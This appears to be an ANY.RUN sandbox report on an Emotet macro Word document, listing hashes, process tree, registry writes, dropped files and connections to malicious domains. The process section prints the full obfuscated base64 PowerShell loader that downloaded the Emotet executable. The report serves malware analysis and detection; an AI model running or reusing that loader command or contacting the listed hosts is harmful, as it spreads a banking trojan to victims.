analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
download:

dlc51-7ws12e-cutccjm

Full analysis: https://app.any.run/tasks/1a4f1b02-915f-4ac4-9722-4c97a6c1a1bc
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: March 15, 2019, 03:01:35
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
emotet
emotet-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Mar 14 20:23:00 2019, Last Saved Time/Date: Thu Mar 14 20:23:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 4, Security: 0
MD5:

F820B097CE4C9AD5E50CEDF97AB05DF9

SHA1:

13008AF271DFBEEC0678AB7DB05F3A37C4EC4A66

SHA256:

05F052ACA11AD0D1D2DABEA4CE046669131B23C30347E864E373BF2F02A84606

SSDEEP:

6144:G77HUUUUUUUUUUUUUUUUUUUT52V9jCeTxbHN5e36IHyJsULKM+w:G77HUUUUUUUUUUUUUUUUUUUTChZbHmKH

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 174.exe (PID: 3276)
      • 174.exe (PID: 4092)
      • wabmetagen.exe (PID: 1840)
      • wabmetagen.exe (PID: 3336)
    • Emotet process was detected

      • wabmetagen.exe (PID: 1840)
  • SUSPICIOUS

    • Application launched itself

      • 174.exe (PID: 4092)
      • wabmetagen.exe (PID: 1840)
    • Creates files in the user directory

      • powershell.exe (PID: 2844)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2844)
      • 174.exe (PID: 3276)
    • Starts itself from another location

      • 174.exe (PID: 3276)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2944)
    • Reads settings of System Certificates

      • powershell.exe (PID: 2844)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2944)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 4
Paragraphs: 1
Lines: 1
Company: -
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 4
Words: -
Pages: 1
ModifyDate: 2019:03:14 20:23:00
CreateDate: 2019:03:14 20:23:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: -
Subject: -
Title: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
6
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe 174.exe no specs 174.exe #EMOTET wabmetagen.exe no specs wabmetagen.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2944"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\dlc51-7ws12e-cutccjm.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2844powershell -e LgAgACgAIAAkAFAAcwBIAG8ATQBlAFsANABdACsAJABQAHMAaABPAG0ARQBbADMAMABdACsAJwBYACcAKQAoAG4ARQBXAC0AbwBiAEoAZQBjAFQAIABJAG8ALgBDAE8AbQBwAFIARQBTAFMASQBPAG4ALgBEAGUAZgBMAEEAdABFAHMAVAByAEUAQQBtACgAWwBpAG8ALgBNAEUAbQBPAFIAWQBTAHQAcgBFAGEAbQBdAFsAcwBZAFMAVABFAE0ALgBjAG8AbgBWAGUAUgB0AF0AOgA6AEYAcgBvAE0AYgBBAHMAZQA2ADQAUwB0AHIAaQBuAEcAKAAoACcAVgBaACcAKwAnAEIAZABhADkAcwB3AEYAJwArACcASQBiAC8AaQBpADQATQBTAHMAaABzAHoAJwArACcANgB0AGgAcAAnACsAJwBjAGIAUQBJACcAKwAnADQAdQBHAFEATgBrAHcASQBUAFEAJwArACcATgAnACsAJwBnADIAQQAnACsAJwByAEoANQBGAGkAVwB6AEsATwBFAHEAZQBFACcAKwAnAC8AUAAnACsAJwBmACcAKwAnAEoAJwArACcAVwA5AHAAdQB1AGgAVABQAGUAYgArACcAKwAnADgAJwArACcASABOACcAKwAnAGcAaQBBADgAaABTACsAaABPAG0ASABHAEsAYQBlACcAKwAnAEEAcgBXAHoAUAAnACsAJwBCAFUAWQArACsAYgAnACsAJwBjAG8ALwBDAGsAaAA5AG8AZwB4AGMAcwAnACsAJwBzACcAKwAnADEAcQBoAHQAJwArACcAZwBQAGcAVABuAGcAJwArACcARQAnACsAJwBLAFoAJwArACcAWABXACcAKwAnAHQAbwBlACcAKwAnAEgATQAnACsAJwBMAFMAeQAwAEwASwBWACcAKwAnAHgAbgBiAEsAeQBxAE0ASQBoACcAKwAnAEcAJwArACcAbgBDACcAKwAnAHYAdgBXAEwAVABhACcAKwAnAE4AMABlAEYAYwArAGgAJwArACcANAAvAHYAWgBOAC8AMwB3AFUAJwArACcANwAwADAAcABnACcAKwAnAFcAJwArACcAOABRADgAJwArACcAbgBkAHMAbwB2AEgAVwBhACcAKwAnAC8AMwBYADkAJwArACcAaQBWAGkAcABkAGEAVgAnACsAJwBVAEYAJwArACcAbwBoAGkAJwArACcARQBsAEIAYgAxAGMAWQBPAEgAOABPAG4AMQAnACsAJwBqAHYAMQBEAEsAJwArACcAZgAyADIAJwArACcATQBiADIAdQAnACsAJwBUAGIARQBKAE4ATgBwACcAKwAnAFAAJwArACcAegA2AGkATABvADcALwBjACcAKwAnAGcASABWAE8AcABzAFgAdQA0AFAAegAnACsAJwBDACcAKwAnADgAOQA0ADAAeAAnACsAJwBmADAAcAAzAEoAYwBoAEQAZQBaAHQAcgBlAHkASQBQAHQASgB4ADQAagAnACsAJwBVAHcAJwArACcAaABWAFUAZgBMAFYATgBhAGMARABnACcAKwAnAEQAdQBDAFYAeQBxAEcAQQBCAEoAJwArACcAQwBVADAAKwBqACcAKwAnADQAcwBBADUAJwArACcAdwBEAFoAJwArACcAOAAnACsAJwB3AGgAegArAGQAJwArACcAVgBsAEMAOABpADkAegBkACcAKwAnAG4AQQAnACsAJwBQAGsAcQA5AFYAQwBmACcAKwAnAEgAbwA0AEgANwBOAHIATwBiACcAKwAnAEYAVwBOAEUAJwArACcALwBxAEwAJwArACcAVAAnACsAJwBtADQAQwBFAHgAcgBnAEcAVwAnACsAJwBtAHkATgBSACcAKwAnADAAVwBRAG8ANgA4ADUAVABKAGYARwAnACsAJwBVAGEAVQBKAGgAOQBiAGoAJwArACcAaQArADIAZQAnACsAJwA3ACcAKwAnAHYAYwB0AGcALwAnACsAJwA0ACcAKwAnAHIAJwArACcAZABTAFQAVQAzAHIASAAnACsAJwB2ADUAQwBiAGwAOAB0ACcAKwAnADYAYwAnACsAJwBxACcAKwAnAG8AOQBRAEoAegBTAEwATQAnACsAJwB1AGMAQwBVADEAbQBXACcAKwAnAHoAJwArACcASQBhACcAKwAnAFQAZABIACcAKwAnADYAJwArACcATQA0AHYATgBCACcAKwAnAHgAJwArACcAbgBVAHEAJwArACcASABkAFcARQBuACsASABKACcAKwAnAFAANwBxADMAcABoACcAKwAnAGMAJwArACcAWgAnACsAJwB2AHAAJwArACcAawAnACsAJwBLAHYAeQAnACsAJwBQACcAKwAnAGMAKwBVAFoARwB6AHEAbgBsACcAKwAnAEwAawB3ACcAKwAnAGEAMABhACcAKwAnAFQAJwArACcAMABrACcAKwAnAFcAdAAnACsAJwBrAHUAdAAnACsAJwBWAEYARgBiAEkAJwArACcAeQAnACsAJwAvAFgAcQB6AFcATgAnACsAJwB1AFkAQwBwAFMAMgAnACsAJwBxADYAagAzAGwAMQB4AG0AJwArACcAdgB3ACcAKwAnAEcAJwApACkAIAAsACAAWwBpAE8ALgBjAE8ATQBQAHIARQBTAHMAaQBPAG4ALgBDAE8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAEQAZQBdADoAOgBEAGUAYwBPAE0AcABSAEUAcwBTACkAfABmAG8AcgBFAGEAQwBIAHsAIABuAEUAVwAtAG8AYgBKAGUAYwBUACAAIABpAE8ALgBzAHQAUgBlAEEATQBSAEUAYQBkAEUAUgAoACAAJABfACAALAAgAFsAcwB5AFMAdABlAE0ALgBUAGUAeABUAC4ARQBuAGMATwBkAGkATgBnAF0AOgA6AEEAUwBDAEkASQApACAAfQAgAHwAIABGAG8AcgBlAEEAQwBIAHsAIAAkAF8ALgBSAGUAYQBEAFQAbwBlAE4AZAAoACkAfQApAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
4092"C:\Users\admin\174.exe" C:\Users\admin\174.exepowershell.exe
User:
admin
Company:
Qihu 360 Software Co., Ltd.
Integrity Level:
MEDIUM
Description:
360 Internet Security Internet Protection
Exit code:
0
Version:
2, 0, 0, 1200
3276"C:\Users\admin\174.exe"C:\Users\admin\174.exe
174.exe
User:
admin
Company:
Qihu 360 Software Co., Ltd.
Integrity Level:
MEDIUM
Description:
360 Internet Security Internet Protection
Exit code:
0
Version:
2, 0, 0, 1200
1840"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe
174.exe
User:
admin
Company:
Qihu 360 Software Co., Ltd.
Integrity Level:
MEDIUM
Description:
360 Internet Security Internet Protection
Exit code:
0
Version:
2, 0, 0, 1200
3336"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exewabmetagen.exe
User:
admin
Company:
Qihu 360 Software Co., Ltd.
Integrity Level:
MEDIUM
Description:
360 Internet Security Internet Protection
Version:
2, 0, 0, 1200
Total events
1 668
Read events
1 259
Write events
404
Delete events
5

Modification events

(PID) Process:(2944) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName::2%
Value:
3A322500800B0000010000000000000000000000
(PID) Process:(2944) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
Off
(PID) Process:(2944) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
On
(PID) Process:(2944) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:WORDFiles
Value:
1315897374
(PID) Process:(2944) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1315897488
(PID) Process:(2944) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1315897489
(PID) Process:(2944) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
Operation:writeName:MTTT
Value:
800B0000FC3B167ADBDAD40100000000
(PID) Process:(2944) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:!4%
Value:
21342500800B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(2944) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:delete valueName:!4%
Value:
21342500800B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(2944) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
Executable files
2
Suspicious files
2
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
2944WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR8E9A.tmp.cvr
MD5:
SHA256:
2844powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MNP6NBN4MBQEA0Q8I6MG.temp
MD5:
SHA256:
2844powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
2944WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$c51-7ws12e-cutccjm.docpgc
MD5:35A574F0A6844298CDC4B3D64A84A765
SHA256:C6C3285A9A78E9AFA368C4DE74DBB74FD635A3D878E5791A746F64EB2877B84C
2844powershell.exeC:\Users\admin\174.exeexecutable
MD5:BA745A625E681DE7C78933F69CD9F632
SHA256:11D14E11570EBAA756B4083A58A336E0489EEC1703012534096131836B4E0519
2944WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:834E57BF2474670695F7650DE8F0E87F
SHA256:38F34E4913BDEB8A7C297186F67BF76F8FB43524733E61EA5E9D475DAE245CB4
2844powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF199be8.TMPbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
3276174.exeC:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exeexecutable
MD5:BA745A625E681DE7C78933F69CD9F632
SHA256:11D14E11570EBAA756B4083A58A336E0489EEC1703012534096131836B4E0519
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
3
DNS requests
3
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2844
powershell.exe
45.252.248.18:443
thanhphotrithuc.com
AZDIGI Corporation
VN
malicious
2844
powershell.exe
60.248.112.142:443
www.gcwhoopee.com
Data Communication Business Group
TW
suspicious

DNS requests

Domain
IP
Reputation
thanhphotrithuc.com
  • 45.252.248.18
malicious
www.gcwhoopee.com
  • 60.248.112.142
suspicious

Threats

No threats detected
No debug info